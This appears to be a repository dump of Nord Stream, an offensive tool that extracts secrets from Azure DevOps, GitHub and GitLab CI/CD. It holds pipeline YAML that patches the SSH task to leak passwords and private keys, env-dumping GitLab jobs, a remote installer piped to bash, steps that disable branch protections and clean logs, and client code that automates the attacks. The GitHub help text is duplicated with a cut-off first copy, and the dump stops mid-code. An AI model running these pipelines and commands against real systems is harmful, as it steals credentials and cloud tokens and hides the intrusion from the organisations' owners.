secret_PROD_SECRET=my PROD_SECRET
```

```bash
$ git verify-commit 00dcd856624bc9a41f8bd70662f0650839730973
gpg: Signature made Tue 18 Jul 2023 10:34:18 PM CEST
gpg:                using DSA key B1583F439899C5A3B74ED04BF94496913C43EFC5
gpg: Good signature from "test-gpg <test.gpg@cicd.local>" [ultimate]
Primary key fingerprint: B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5
```

### Azure DevOps

Nord Stream can extract the following types of secrets:

- Variable groups (vg)
- Secure files (sf)
- Service connections

#### Service connections

Azure DevOps offers the possibility to create connections with external and remote services for executing tasks in a job. To do so, service connections are used. A service connection holds credentials for an identity to a remote service. There are multiple types of service connections in Azure DevOps. Nord Stream currently supports secret extraction for the following types of service connections:

- AzureRM
- GitHub
- AWS
- SonarQube
- SSH

If you come across a non-supported type, please open an issue or make a pull request :)

##### SSH

The extraction for this service connection type was painful to implement. The output is the following:

```
hostname:::port:::user:::password:::privatekey
```

If you want to run it on a self-hosted runner, you can do the following:

```
$ nord-stream devops ... --build-yaml test.yml --build-type ssh
[+] YAML file:
trigger: none
pool:
  vmImage: ubuntu-latest
steps:
  - checkout: none
  - script: SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js) ; cp $SSH_FILE $SSH_FILE.bak ; sed -i 's|const readyTimeout = getReadyTimeoutVariable();|const readyTimeout = getReadyTimeoutVariable();\nconst fs = require("fs");var data = "";data += hostname + ":::" + port + ":::" + username + ":::" + password + ":::" + privateKey;fs.writeFile("/tmp/artefacts.tar.gz", data, (err) => {});|' $SSH_FILE
    displayName: Preparing Build artefacts
  - task: SSH@0
    inputs:
      sshEndpoint: '#FIXME'
      runOptions: commands
      commands: sleep 1
  - script: SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js); mv $SSH_FILE.bak $SSH_FILE ; cat /tmp/artefacts.tar.gz | base64 -w0 | base64 -w0 ; echo ''
    displayName: Build artefacts
```

Then you need to:

1) Change `vmImage: ubuntu-latest` to `name: 'Self-Hosted pool name'`.
2) Add the name of the service connection in the `#FIXME` placeholder.
3) Deploy the pipeline with `--yaml test.yml`.

If you need to run this on a Windows self-hosted runner, change `_serviceConnectionTemplateSSH` to `_serviceConnectionTemplateSSHWindows` in the `generatePipelineForSSH` method and perform the actions described previously.

Note: for both Windows and Linux self-hosted runners, you need to adapt the path (`/home/vsts/work/_tasks/` or `D:\a\`) to match the path where the runner is deployed. This information can be obtained in the `Capabilities` tab of an agent on Azure DevOps.

#### Listing orgs

With an access token, it's possible to list the organizations bound to a user:

```
$ nord-stream devops --token "eyJ0eXA..." --list-orgs
[*] User orgs:
- myorg
- supersecretorg
```

This is based on [this research](https://zolder.io/en/blog/devops-access-is-closer-than-you-assume/).

#### Help

```
$ nord-stream devops -h
CICD pipeline exploitation tool

Usage:
    nord-stream devops [options] --token --org [extraction] [--project --write-filter --no-clean --branch-name --pipeline-name --repo-name ]
    nord-stream devops [options] --token --org --yaml --project [--write-filter --no-clean --branch-name --pipeline-name --repo-name ]
    nord-stream devops [options] --token --org --build-yaml [--build-type ]
    nord-stream devops [options] --token --org --clean-logs [--project ]
    nord-stream devops [options] --token --org --list-projects [--write-filter]
    nord-stream devops [options] --token --org (--list-secrets [--project --write-filter] | --list-users)
    nord-stream devops [options] --token --org --describe-token

Options:
    -h --help                   Show this screen.
    --version                   Show version.
    -v, --verbose               Verbose mode
    -d, --debug                 Debug mode
    --output-dir                Output directory for logs
    --ignore-cert               Allow insecure server connections

Commit:
    --user                      User used to commit
    --email                     Email address used to commit
    --key-id                    GPG primary key ID to sign commits

args:
    --token                     Azure DevOps personal token or JWT
    --org                       Org name
    -p, --project               Run on selected project (can be a file)
    -y, --yaml                  Run arbitrary job
    --clean-logs                Delete all pipelines created by this tool. This operation is done by default but can be manually triggered.
    --no-clean                  Don't clean pipeline logs (default false)
    --list-projects             List all projects.
    --list-secrets              List all secrets.
    --list-users                List all users.
    --write-filter              Filter projects where current user has write or admin access.
    --build-yaml                Create a pipeline yaml file with default configuration.
    --build-type                Type used to generate the yaml file, can be: default, azurerm, github, aws, sonar, ssh
    --describe-token            Display information on the token
    --branch-name               Use specific branch name for deployment.
    --pipeline-name             Use pipeline for deployment.
    --repo-name                 Use specific repo for deployment.

Extraction:
    --extract                   Extract following secrets [vg,sf,gh,az,aws,sonar,ssh]
    --no-extract                Don't extract following secrets [vg,sf,gh,az,aws,sonar,ssh]

Examples:
    List all secrets from all projects
    $ nord-stream devops --token "$PAT" --org myorg --list-secrets

    Dump all secrets from all projects
    $ nord-stream devops --token "$PAT" --org myorg

Authors: @hugow @0hexit
```

### GitHub

#### List protections

The `--list-protections` option can be used to list the protections applied to a branch and to environments:

```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --list-protections
[*] Using branch: "main"
[*] Checking security: "synacktiv/repo"
[*] Found branch protection rule on "main" branch
[*] Branch protections:
    - enforce admins: True
    - block creations: True
    - required signatures: True
    - allow force pushes: False
    - allow deletions: False
    - required pull request reviews: False
    - required linear history: False
    - required conversation resolution: False
    - lock branch: False
    - allow fork syncing: False
[*] Environment protection for: "DEV":
    - deployment branch policy: custom
[*] No environment protection rule found for: "INT"
[*] Environment protection for: "PROD":
    - deployment branch policy: custom
```

Depending on your permissions, less information may be displayed; only administrators get the full details of the protections.

#### Disable protections

The `--disable-protections` option can be used to temporarily disable the protections applied to a branch or an environment, perform the dump and then restore all the protections:

```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --no-repo --no-org --env prod --disable-protections
[*] Using branch: "main"
[+] "synacktiv/repo"
[*] Found branch protection rule on "main" branch
[...]
[!] Removing branch protection, wait until it's restored.
[*] Getting secrets from environment: "prod" (synacktiv/repo)
[*] Environment protection for: "PROD":
    - deployment branch policy: custom
[!] Modifying env protection, wait until it's restored.
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[!] Restoring env protections.
[+] Secrets:
secret_PROD_SECRET=my PROD_SECRET
[*] Cleaning logs.
[!] Restoring branch protection.
```

This requires admin privileges.

#### Force

By default, if Nord Stream detects a protection on a branch or on an environment, it won't perform the secret extraction. If you think that the protections are too permissive or can be bypassed with your privileges, the `--force` option can be used to deploy the pipeline regardless of the protections.

#### Azure OIDC

OIDC (OpenID Connect) can be used to connect to cloud services. The general idea is to allow authorized pipelines or workflows to get short-lived access tokens directly from a cloud provider, without involving any static secrets. Authorization is based on trust relationships configured on the cloud provider's side, conditioned by the origin of the pipeline or workflow. Here is an example of a GitHub workflow using OIDC:

```yaml
[...]
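# How the exchange works, in short: the job requests a signed JWT from
# GitHub's OIDC provider, and azure/login presents it to the cloud provider,
# which validates it against the configured trust relationship (repository,
# branch, environment, etc.) before returning a short-lived access token.
# No static credential is stored in the repository; note that the job must
# be granted `permissions: id-token: write` to be allowed to request the JWT.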
steps:
  - name: OIDC Login to Azure Public Cloud
    uses: azure/login@v1
    with:
      client-id: ${{ secrets.AZURE_CLIENT_ID }}
      tenant-id: ${{ secrets.AZURE_TENANT_ID }}
      subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }} # this can be optional
```

If you come across such a workflow, this means that the repository might be configured to get a short-lived access token that can give you access to Azure resources. Nord Stream is able to deploy a pipeline to retrieve such an access token with the following options:

```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --azure-client-id 65cd6002-25b9-11ee-88ac-7f80b19430c2 --azure-tenant-id 65cd6002-25b9-11ee-88ac-7f80b19430c2
[*] Using branch: "main"
[+] "synacktiv/repo"
[*] No branch protection rule found on "main" branch
[*] Running OIDC Azure access tokens generation workflow
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] OIDC access tokens:
Access token to use with Azure Resource Manager API:
{
    "accessToken": "eyJ0eXAiOiJK[...]PVig",
    "expiresOn": "2023-07-18 23:18:57.000000",
    "subscription": "65cd6002-25b9-11ee-88ac-7f80b19430c2",
    "tenant": "65cd6002-25b9-11ee-88ac-7f80b19430c2",
    "tokenType": "Bearer"
}

Access token to use with MS Graph API:
{
    "accessToken": "eyJ0eXAi[...]_qTA",
    "expiresOn": "2023-07-19 22:18:59.000000",
    "subscription": "65cd6002-25b9-11ee-88ac-7f80b19430c2",
    "tenant": "65cd6002-25b9-11ee-88ac-7f80b19430c2",
    "tokenType": "Bearer"
}
```

The `--azure-subscription-id` option is optional and can be used to get an access token for a specific subscription.

#### AWS OIDC

The same technique (see [Azure OIDC](#azure-oidc)) can be used to get a session token on AWS. Here is an example of a workflow using AWS OIDC:

```yaml
[...]
steps:
  - name: Configure AWS Credentials
    uses: aws-actions/configure-aws-credentials@v1
    with:
      role-to-assume: arn:aws:iam::133333333337:role/S3Access/CustomRole
      role-session-name: oidcrolesession
      aws-region: us-east-1
```

If you come across such a workflow, this means that the repository might be configured to get an AWS access token that can give you access to AWS resources. Nord Stream is able to deploy a pipeline to retrieve such an access token with the following options:

```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --aws-role 'arn:aws:iam::133333333337:role/S3Access/CustomRole' --aws-region us-east-1 --force
[+] "Synacktiv/repo"
[*] Running OIDC AWS credentials generation workflow
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] OIDC credentials:
AWS_DEFAULT_REGION=us-east-1
AWS_SESSION_TOKEN=IQoJb3[...]KMs0/QB6
AWS_REGION=us-east-1
AWS_ACCESS_KEY_ID=ASIA5ABC8XDMAP2ANNWO
AWS_SECRET_ACCESS_KEY=7KJLCjdJKqlpLKDAI9F7SH6SjSQBX68Sjm13xXDA
```

#### Help

```
$ nord-stream github -h
CICD pipeline exploitation tool

Usage:
    nord-stream github [options] --token --org [--repo --no-repo --no-env --no-org --env --disable-protections --branch-name --no-clean (--key-id --user --email )]
    nord-stream github [options] --token --org --yaml --repo [--env --disable-protections --branch-name --no-clean (--key-id --user --email )]
    nord-stream github [options] --token --org ([--clean-logs] [--clean-branch-policy]) [--repo --branch-name ]
    nord-stream github [options] --token --org --build-yaml --repo [--env ]
    nord-stream github [options] --token --org --azure-tenant-id --azure-client-id [--azure-subscription-id --repo --env --disable-protections --branch-name --no-clean]
    nord-stream github [options] --token --org --aws-role --aws-region [--repo --env --disable-protections --branch-name --no-clean]
    nord-stream github [options] --token --org --list-protections [--repo --branch-name --disable-protections (--key-id --user --email )]
    nord-stream github [options] --token --org --list-secrets [--repo --no-repo --no-env --no-org]
    nord-stream github [options] --token [--org ] --list-repos [--write-filter]
    nord-stream github [options] --token --describe-token

Options:
    -h --help                   Show this screen.
    --version                   Show version.
    -v, --verbose               Verbose mode
    -d, --debug                 Debug mode
    --output-dir                Output directory for logs

Signing:
    --key-id                    GPG primary key ID
    --user                      User used to sign commits
    --email                     Email address used to sign commits

args:
    --token                     GitHub personal token
    --org                       Org name
    -r, --repo                  Run on selected repo (can be a file)
    -y, --yaml                  Run arbitrary job
    --clean-logs                Delete all logs created by this tool. This operation is done by default but can be manually triggered.
    --no-clean                  Don't clean workflow logs (default false)
    --clean-branch-policy       Remove branch policy, can be used with --repo. This operation is done by default but can be manually triggered.
    --build-yaml                Create a pipeline yaml file with all secrets.
    --env                       Specify env for the yaml file creation.
    --no-repo                   Don't extract repo secrets.
    --no-env                    Don't extract environment secrets.
    --no-org                    Don't extract organization secrets.
    --azure-tenant-id           Identifier of the Azure tenant associated with the application having federated credentials (OIDC related).
    --azure-subscription-id     Identifier of the Azure subscription associated with the application having federated credentials (OIDC related).
    --azure-client-id           Identifier of the Azure application (client) associated with the application having federated credentials (OIDC related).
    --aws-role                  AWS role to assume (OIDC related).
    --aws-region                AWS region (OIDC related).
    --list-protections          List all protections.
    --list-repos                List all repos.
    --list-secrets              List all secrets.
    --disable-protections       Disable the branch protection rules (needs admin rights)
    --write-filter              Filter repos where current user has write or admin access.
    --force                     Don't check environment and branch protections.
    --branch-name               Use specific branch name for deployment.
#### Help

```
$ nord-stream github -h
CICD pipeline exploitation tool

Usage:
    nord-stream github [options] --token --org [--repo --no-repo --no-env --no-org --env --disable-protections --branch-name --no-clean (--key-id --user --email )]
    nord-stream github [options] --token --org --yaml --repo [--env --disable-protections --branch-name --no-clean (--key-id --user --email )]
    nord-stream github [options] --token --org ([--clean-logs] [--clean-branch-policy]) [--repo --branch-name ]
    nord-stream github [options] --token --org --build-yaml --repo [--env ]
    nord-stream github [options] --token --org --azure-tenant-id --azure-client-id [--azure-subscription-id --repo --env --disable-protections --branch-name --no-clean]
    nord-stream github [options] --token --org --aws-role --aws-region [--repo --env --disable-protections --branch-name --no-clean]
    nord-stream github [options] --token --org --list-protections [--repo --branch-name --disable-protections (--key-id --user --email )]
    nord-stream github [options] --token --org --list-secrets [--repo --no-repo --no-env --no-org]
    nord-stream github [options] --token [--org ] --list-repos [--write-filter]
    nord-stream github [options] --token --describe-token

Options:
    -h --help                 Show this screen.
    --version                 Show version.
    -v, --verbose             Verbose mode
    -d, --debug               Debug mode
    --output-dir              Output directory for logs

Signing:
    --key-id                  GPG primary key ID
    --user                    User used to sign commits
    --email                   Email address used to sign commits

args:
    --token                   Github personal token
    --org                     Org name
    -r, --repo                Run on selected repo (can be a file)
    -y, --yaml                Run arbitrary job
    --clean-logs              Delete all logs created by this tool. This operation is done by default but can be manually triggered.
    --no-clean                Don't clean workflow logs (default false)
    --clean-branch-policy     Remove branch policy, can be used with --repo. This operation is done by default but can be manually triggered.
    --build-yaml              Create a pipeline yaml file with all secrets.
    --env                     Specify env for the yaml file creation.
    --no-repo                 Don't extract repo secrets.
    --no-env                  Don't extract environments secrets.
    --no-org                  Don't extract organization secrets.
    --azure-tenant-id         Identifier of the Azure tenant associated with the application having federated credentials (OIDC related).
    --azure-subscription-id   Identifier of the Azure subscription associated with the application having federated credentials (OIDC related).
    --azure-client-id         Identifier of the Azure application (client) associated with the application having federated credentials (OIDC related).
    --aws-role                AWS role to assume (OIDC related).
    --aws-region              AWS region (OIDC related).
    --list-protections        List all protections.
    --list-repos              List all repos.
    --list-secrets            List all secrets.
    --disable-protections     Disable the branch protection rules (needs admin rights)
    --write-filter            Filter repo where current user has write or admin access.
    --force                   Don't check environment and branch protections.
    --branch-name             Use specific branch name for deployment.
    --describe-token          Display information on the token

Examples:
    List all secrets from all repositories
    $ nord-stream github --token "$GHP" --org myorg --list-secrets

    Dump all secrets from all repositories and try to disable branch protections
    $ nord-stream github --token "$GHP" --org myorg --disable-protections

Authors: @hugow @0hexit
```

### GitLab

As described in the article, there is no way to remove the logs from the activity tab after a pipeline deployment. This must be taken into account during Red Team engagements.

#### List secrets

The `--list-secrets` option can be used to list and extract secrets from GitLab. GitLab manages secrets a bit differently from Azure DevOps and GitHub Actions. With admin access to a project, a group, or even the GitLab instance itself, it is possible to extract all the defined CI/CD variables without deploying any pipeline.

A low-privileged user, however, cannot list the secrets defined at the project, group or instance level, and therefore has no means of knowing whether a secret is defined in a specific project; the only option is to look at the legitimate pipelines already present in the project and check whether they use sensitive environment variables. Still, users with write privileges over a project can deploy a malicious pipeline to exfiltrate the environment variables, which expose the CI/CD variables. Here is a pipeline file to perform this operation on GitLab:

```yaml
stages:
  - synacktiv

deploy-production:
  image: ubuntu:latest
  stage: synacktiv
  script:
    - env | base64 -w0 | base64 -w 0
```

GitLab also supports secure files, like Azure DevOps. Secure files are defined at the project level. As with variables, it is not possible to list the secure files without admin access to the project. With such access, however, Nord Stream will try to exfiltrate the secure files related to the projects.
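Even without admin access, a user with write access should be able to fetch the secure files from inside a pipeline, since any job of the project can download them. A minimal sketch using GitLab's `download-secure-files` helper (the job name is an assumption; the installer URL and the default `.secure_files` download directory are taken from the GitLab documentation):

```yaml
stages:
  - synacktiv

exfil-secure-files:
  image: ubuntu:latest
  stage: synacktiv
  script:
    - apt-get update -qq && apt-get install -y -qq curl # the bare ubuntu image ships without curl
    - curl --silent "https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files/-/raw/main/installer" | bash
    - for f in .secure_files/*; do echo "$f"; base64 -w0 "$f"; echo; done
```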
#### YAML

Same as [YAML](#yaml); however, you need to provide the full project path:

```sh
$ nord-stream gitlab --token "$PAT" --url https://gitlab.corp.local --project 'group/projectname' --yaml ci.yml
```

The `--list-projects` command returns paths in this format.

#### List protections

Same as [GitHub list protections](#list-protections).

#### Help

```
$ nord-stream gitlab -h
CICD pipeline exploitation tool

Usage:
    nord-stream gitlab [options] --token (--list-secrets | --list-protections) [--project --group --no-project --no-group --no-instance --write-filter]
    nord-stream gitlab [options] --token ( --list-groups | --list-projects ) [--project --group --write-filter]
    nord-stream gitlab [options] --token --yaml --project [--no-clean]
    nord-stream gitlab [options] --token --clean-logs [--project ]
    nord-stream gitlab [options] --token --describe-token

Options:
    -h --help                 Show this screen.
    --version                 Show version.
    -v, --verbose             Verbose mode
    -d, --debug               Debug mode
    --output-dir              Output directory for logs
    --url                     Gitlab URL [default: https://gitlab.com]
    --ignore-cert             Allow insecure server connections

Commit:
    --user                    User used to commit
    --email                   Email address used to commit
    --key-id                  GPG primary key ID to sign commits

args:
    --token                   GitLab personal access token or _gitlab_session cookie
    --project                 Run on selected project (can be a file)
    --group                   Run on selected group (can be a file)
    --list-secrets            List all secrets.
    --list-protections        List branch protection rules.
    --list-projects           List all projects.
    --list-groups             List all groups.
    --write-filter            Filter repo where current user has developer access or more.
    --no-project              Don't extract project secrets.
    --no-group                Don't extract group secrets.
    --no-instance             Don't extract instance secrets.
    -y, --yaml                Run arbitrary job
    --branch-name             Use specific branch name for deployment.
    --clean-logs              Delete all pipeline logs created by this tool. This operation is done by default but can be manually triggered.
    --no-clean                Don't clean pipeline logs (default false)
    --describe-token          Display information on the token

Examples:
    Dump all secrets
    $ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --list-secrets

    Deploy the custom pipeline on the master branch
    $ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --yaml exploit.yaml --branch-name master --project 'group/projectname'

Authors: @hugow @0hexit
```

## TODO

- [ ] Add support of URLs corresponding to Azure DevOps Server instances (on-premises solutions)
- [ ] Add an option to extract secrets via Windows hosts
- [ ] Add support of other CI/CD environments (Jenkins/Bitbucket)
- [ ] Use the GitHub GraphQL API instead of the REST one to list the branch protection rules and temporarily disable them if they match the malicious branch about to be pushed

## Contact

Please submit any bugs, issues, questions, or feature requests under "Issues" or send them to us on Twitter [@hugow](https://twitter.com/hugow_vincent) and [@0hexit](https://twitter.com/0hexit).


================================================
FILE: nordstream/__main__.py
================================================
#!/usr/bin/env python3
"""
CICD pipeline exploitation tool

Usage:
    nord-stream <command> [<args>...]

Commands
    github      command related to GitHub.
    devops      command related to Azure DevOps.
    gitlab      command related to GitLab.

Options:
    -h --help       Show this screen.
    --version       Show version.

Authors: @hugow @0hexit
"""

from docopt import docopt
from nordstream.utils.log import logger


def main():
    args = docopt(__doc__, version="0.1", options_first=True)

    argv = [args["<command>"]] + args["<args>"]

    if args["<command>"] == "github":
        import nordstream.commands.github as github

        github.start(argv)

    elif args["<command>"] == "devops":
        import nordstream.commands.devops as devops

        devops.start(argv)

    elif args["<command>"] == "gitlab":
        import nordstream.commands.gitlab as gitlab

        gitlab.start(argv)

    else:
        logger.error(f"{args['<command>']} is not a nord-stream command.")


if __name__ == "__main__":
    main()


================================================
FILE: nordstream/cicd/devops.py
================================================
import requests
import time
from os import makedirs
from nordstream.utils.log import logger
from nordstream.yaml.devops import DevOpsPipelineGenerator
from nordstream.git import Git
from nordstream.utils.errors import DevOpsError
from nordstream.utils.constants import *
from nordstream.utils.helpers import isAZDOBearerToken

# painful warnings, you know what you are doing, right?
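# disable_warnings() silences urllib3's InsecureRequestWarning, which would
# otherwise flood the output when --ignore-cert is used against instances
# serving self-signed certificates.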
requests.packages.urllib3.disable_warnings() class DevOps: _DEFAULT_PIPELINE_NAME = DEFAULT_PIPELINE_NAME _DEFAULT_BRANCH_NAME = DEFAULT_BRANCH_NAME _token = None _auth = None _org = None _devopsLoginId = None _projects = [] _baseURL = "https://dev.azure.com/" _header = { "Accept": "application/json; api-version=6.0-preview", "User-Agent": USER_AGENT, } _session = None _repoName = DEFAULT_REPO_NAME _outputDir = OUTPUT_DIR _pipelineName = _DEFAULT_PIPELINE_NAME _branchName = _DEFAULT_BRANCH_NAME _defaultAgentPool = None _sleepTime = 15 _maxRetry = 10 def __init__(self, token, org, verifCert): self._token = token self._org = org self._baseURL += f"{org}/" self._session = requests.Session() self.setCookiesAndHeaders() self._session.verify = verifCert self._devopsLoginId = self.__getLogin() @property def projects(self): return self._projects @property def org(self): return self._org @property def branchName(self): return self._branchName @branchName.setter def branchName(self, value): self._branchName = value @property def repoName(self): return self._repoName @repoName.setter def repoName(self, value): self._repoName = value @property def pipelineName(self): return self._pipelineName @pipelineName.setter def pipelineName(self, value): self._pipelineName = value @property def defaultAgentPool(self): return self._defaultAgentPool @defaultAgentPool.setter def defaultAgentPool(self, value): self._defaultAgentPool = value @property def sleepTime(self): return self._sleepTime @sleepTime.setter def sleepTime(self, value): self._sleepTime = int(value) @property def token(self): return self._token @property def outputDir(self): return self._outputDir @outputDir.setter def outputDir(self, value): self._outputDir = value @property def defaultPipelineName(self): return self._DEFAULT_PIPELINE_NAME @property def defaultBranchName(self): return self._DEFAULT_BRANCH_NAME def __getLogin(self): return self.getUser().get("authenticatedUser").get("id") def getUser(self): logger.debug("Retrieving user informations") return self._session.get( f"{self._baseURL}/_apis/ConnectionData", ).json() def setCookiesAndHeaders(self): if isAZDOBearerToken(self._token): self._session.headers.update({"Authorization": f"Bearer {self._token}"}) else: self._session.auth = ("", self._token) self._session.headers.update(self._header) def listProjects(self): logger.debug("Listing projects") continuationToken = 0 # Azure DevOps pagination while True: params = {"continuationToken": continuationToken} response = self._session.get( f"{self._baseURL}/_apis/projects", params=params, ).json() if len(response.get("value")) != 0: for repo in response.get("value"): p = {"id": repo.get("id"), "name": repo.get("name")} self._projects.append(p) continuationToken += response.get("count") else: break def listUsers(self): logger.debug("Listing users") continuationToken = None res = [] params = {} # Azure DevOps pagination while True: if continuationToken: params = {"continuationToken": continuationToken} response = self._session.get( f"https://vssps.dev.azure.com/{self._org}/_apis/graph/users", params=params, ) headers = response.headers response = response.json() if len(response.get("value")) != 0: for user in response.get("value"): p = { "origin": user.get("origin"), "displayName": user.get("displayName"), "mailAddress": user.get("mailAddress"), } res.append(p) continuationToken = headers.get("x-ms-continuationtoken", None) if not continuationToken: break else: break return res # TODO: crappy code I know def filterWriteProjects(self): 
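        # Keeps only the projects where the authenticated user is a member of a
        # group granting write access ("<project> Team", "Contributors" or
        # "Project Administrators"), as checked by __checkProjectPrivs() below.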
continuationToken = None res = [] params = {} # Azure DevOps pagination while True: if continuationToken: params = {"continuationToken": continuationToken} response = self._session.get( f"https://vssps.dev.azure.com/{self._org}/_apis/graph/groups", params=params, ) headers = response.headers response = response.json() if len(response.get("value")) != 0: for project in self._projects: for group in response.get("value"): name = project.get("name") if self.__checkProjectPrivs(self._devopsLoginId, name, group): duplicate = False for p in res: if p.get("id") == project.get("id"): duplicate = True if not duplicate: res.append(project) continuationToken = headers.get("x-ms-continuationtoken", None) if not continuationToken: break else: break self._projects = res def __checkProjectPrivs(self, login, projectName, group): groupPrincipalName = group.get("principalName") writeGroups = [ f"[{projectName}]\\{projectName} Team", f"[{projectName}]\\Contributors", f"[{projectName}]\\Project Administrators", ] pagingToken = None params = {} for g in writeGroups: if groupPrincipalName == g: originId = group.get("originId") while True: if pagingToken: params = {"pagingToken": pagingToken} response = self._session.get( f"https://vsaex.dev.azure.com/{self._org}/_apis/GroupEntitlements/{originId}/members", params=params, ).json() pagingToken = response.get("continuationToken") if len(response.get("items")) != 0: for user in response.get("items"): if user.get("id") == login: return True else: return False def listRepositories(self, project): logger.debug("Listing repositories") response = self._session.get( f"{self._baseURL}/{project}/_apis/git/repositories", ).json() return response.get("value") def listPipelines(self, project): logger.debug("Listing pipelines") response = self._session.get( f"{self._baseURL}/{project}/_apis/pipelines", ).json() return response.get("value") def addProject(self, project): logger.debug(f"Checking project: {project}") response = self._session.get( f"{self._baseURL}/_apis/projects/{project}", ).json() if response.get("id"): p = {"id": response.get("id"), "name": response.get("name")} self._projects.append(p) @classmethod def checkToken(cls, token, org, verifCert): logger.verbose(f"Checking token: {token}") try: return ( requests.get( f"https://dev.azure.com/{org}/_apis/ConnectionData", auth=("foo", token), headers=DevOps._header, verify=verifCert, ).status_code == 200 ) except Exception as e: logger.error(e) return False def listProjectVariableGroupsSecrets(self, project): logger.debug(f"Listing variable groups for: {project}") response = self._session.get( f"{self._baseURL}/{project}/_apis/distributedtask/variablegroups", ) if response.status_code != 200: raise DevOpsError("Can't list variable groups secrets.") response = response.json() res = [] if response.get("count", 0) != 0: for variableGroup in response.get("value"): name = variableGroup.get("name") id = variableGroup.get("id") variables = [] for var in variableGroup.get("variables").keys(): variables.append(var) res.append({"name": name, "id": id, "variables": variables}) return res def listProjectSecureFiles(self, project): logger.debug(f"Listing secure files for: {project}") response = self._session.get( f"{self._baseURL}/{project}/_apis/distributedtask/securefiles", ) if response.status_code != 200: raise DevOpsError("Can't list secure files.") response = response.json() res = [] if response["count"]: for secureFile in response["value"]: res.append({"name": secureFile["name"], "id": secureFile["id"]}) return res def 
authorizePipelineForResourceAccess(self, projectId, pipelineId, resource, resourceType): resourceId = resource["id"] logger.debug(f"Checking current pipeline permissions for: \"{resource['name']}\"") response = self._session.get( f"{self._baseURL}/{projectId}/_apis/pipelines/pipelinePermissions/{resourceType}/{resourceId}", ).json() allPipelines = response.get("allPipelines") if allPipelines and allPipelines.get("authorized"): return True for pipeline in response.get("pipelines"): if pipeline.get("id") == pipelineId: return True logger.debug(f"\"{resource['name']}\" has restricted permissions. Adding access permissions for the pipeline") response = self._session.patch( f"{self._baseURL}/{projectId}/_apis/pipelines/pipelinePermissions/{resourceType}/{resourceId}", json={"pipelines": [{"id": pipelineId, "authorized": True}]}, ) if response.status_code != 200: logger.error(f"Error: unable to give the custom pipeline access to {resourceType}: \"{resource['name']}\"") return False return True def createGit(self, project): logger.debug(f"Creating git repo for: {project}") data = {"name": self._repoName, "project": {"id": project}} response = self._session.post( f"{self._baseURL}/{project}/_apis/git/repositories", json=data, ).json() return response def deleteGit(self, project, repoId): logger.debug(f"Deleting git repo for: {project}") response = self._session.delete( f"{self._baseURL}/{project}/_apis/git/repositories/{repoId}", ) return response.status_code == 204 def createPipeline(self, project, repoId, path): logger.debug("Creating pipeline") data = { "folder": None, "name": self._pipelineName, "configuration": { "type": "yaml", "path": path, "repository": { "id": repoId, "type": "azureReposGit", "defaultBranch": self._branchName, }, }, } response = self._session.post( f"{self._baseURL}/{project}/_apis/pipelines", json=data, ).json() pipeline_id = response.get("id") if self._defaultAgentPool: logger.debug("Setting default agent pool") # Retrieve project queues, not organization pools, for Default agent pool queues_url = f"{self._baseURL}/{project}/_apis/distributedtask/queues" response = self._session.get(queues_url) queues = response.json() queue_id = None queue_name = None for queue in queues['value']: if queue['pool']['name'] == self._defaultAgentPool: queue_id = queue['id'] queue_name = queue['name'] logger.info(f"Queue found : {queue_name} (Queue ID: {queue_id}, Pool ID: {queue['pool']['id']})") break if not queue_id: logger.error(f"Queue {self._defaultAgentPool} not found for default agent pool, or not accessible by the project. 
Not updating") return pipeline_id # Update pipeline Default agent with specified queue, via the definitions API update_url = f"{self._baseURL}/{project}/_apis/build/definitions/{pipeline_id}" response = self._session.get(update_url) definition = response.json() # Add default pool agent with queue definition['queue'] = { 'id': queue_id, 'name': queue_name } response = self._session.put(update_url, json=definition) return pipeline_id def runPipeline(self, project, pipelineId): logger.debug(f"Running pipeline: {pipelineId}") params = { "definition": {"id": pipelineId}, "sourceBranch": f"refs/heads/{self._branchName}", } response = self._session.post( f"{self._baseURL}/{project}/_apis/build/Builds", json=params, ).json() return response def __getBuilds(self, project): logger.debug(f"Getting builds.") return ( self._session.get( f"{self._baseURL}/{project}/_apis/build/Builds", ) .json() .get("value") ) def __getBuildSources(self, project, buildId): return self._session.get( f"{self._baseURL}/{project}/_apis/build/Builds/{buildId}/sources", ).json() def getRunId(self, project, pipelineId): logger.debug(f"Getting RunId for pipeline: {pipelineId}") for i in range(self._maxRetry): # Don't wait first time if i != 0: logger.warning(f"Run not available, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) for build in self.__getBuilds(project): if build.get("definition").get("id") == pipelineId: buildId = build.get("id") buildSource = self.__getBuildSources(project, buildId) if ( buildSource.get("comment") == Git.ATTACK_COMMIT_MSG and buildSource.get("author").get("email") == Git.EMAIL ): return buildId if i == (self._maxRetry): logger.error("Error: run still not ready.") return None def waitPipeline(self, project, pipelineId, runId): logger.info("Getting pipeline output") for i in range(self._maxRetry): if i != 0: logger.warning(f"Pipeline still running, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) response = self._session.get( f"{self._baseURL}/{project}/_apis/pipelines/{pipelineId}/runs/{runId}", json={}, ).json() if response.get("state") == "completed": return response.get("result") if i == (self._maxRetry - 1): logger.error("Error: pipeline still not finished.") return None def __createPipelineOutputDir(self, projectName): makedirs(f"{self._outputDir}/{self._org}/{projectName}", exist_ok=True) def downloadPipelineOutput(self, projectId, runId): self.__createPipelineOutputDir(projectId) for i in range(self._maxRetry): if i != 0: logger.warning(f"Output not ready, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) buildTimeline = self._session.get( f"{self._baseURL}/{projectId}/_apis/build/builds/{runId}/timeline", json={}, ).json() logs = [ record["log"]["id"] for record in buildTimeline["records"] if record["name"] == DevOpsPipelineGenerator.taskName ] if len(logs) != 0: break # if there are logs but we didn't find the taskName get the last # job as it contain all data if len(buildTimeline["records"]) > 0: logs = 